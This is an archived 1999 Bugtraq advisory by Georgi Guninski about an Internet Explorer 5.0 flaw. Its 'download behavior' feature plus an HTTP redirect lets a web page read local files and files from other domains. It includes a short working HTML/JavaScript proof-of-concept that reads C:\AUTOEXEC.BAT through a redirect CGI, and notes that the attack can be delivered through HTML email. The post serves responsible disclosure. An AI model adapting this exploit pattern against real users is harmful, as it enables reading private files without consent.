[12021] in bugtraq
IE 5.0 security vulnerability - reading local (and from any
daemon@ATHENA.MIT.EDU (Georgi Guninski)
Mon Sep 27 17:02:49 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <37EF5D5C.41ABBF80@nat.bg>
Date: Mon, 27 Sep 1999 15:04:44 +0300
Reply-To: Georgi Guninski <joro@NAT.BG>
From: Georgi Guninski <joro@NAT.BG>
X-To: Bugtraq <BUGTRAQ@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
IE 5.0 security vulnerability - reading local (and from any domain) text
files using "download behavior"
Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or indirect use of the
information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.
Description:
Internet Explorer 5.0 under Windows 95 and Windows NT 4.0 (suppose Win98
is vulnerable)
allows reading local text files (the extension does not matter) and
parts of binary files.
It is also possible to read text files from any domain and in some cases
reading files from a web server behind a firewall.
Details:
The problem is the IE feature "download behavior".
It is possible to click on a link and a callback function to be
executed.
When the callback function is executed by "startDownload" method, the
downloaded file is passed as an argument to the callback function.
Microsoft has implemented some security which does not allow downloading
files in this way from a different domain.
But if the link points to a file in same domain as the exploit page and
a HTTP redirect is forced,
then the exploit works.
It is not necessary the user to click on the link, this may be done
automatically.
This vulnerability may be exploited using HTML email message or a
newsgroup posting.
The code is:
----------------------------------------------------------------------------------------
<SCRIPT>
function doit(s)
{
alert ("Here is your file:\n"+s);
}
</SCRIPT>
<A ID="oD" STYLE="behavior:url(#default#download)"
HREF="javascript:oD.startDownload('http://www.nat.bg/~joro/reject.cgi?autoexec',
doit)">Click here to read C:\AUTOEXEC.BAT</A>.
----------------------------------------------------------------------------------------
("http://www.nat.bg/~joro/reject.cgi?autoexec" just does a HTTP redirect
to file://c:/autoexec.bat)
Workaround:
Disable Active Scripting
Demonstration is available at http://www.nat.bg/~joro/download2.html
Regards,
Georgi Guninski
http://www.nat.bg/~joro
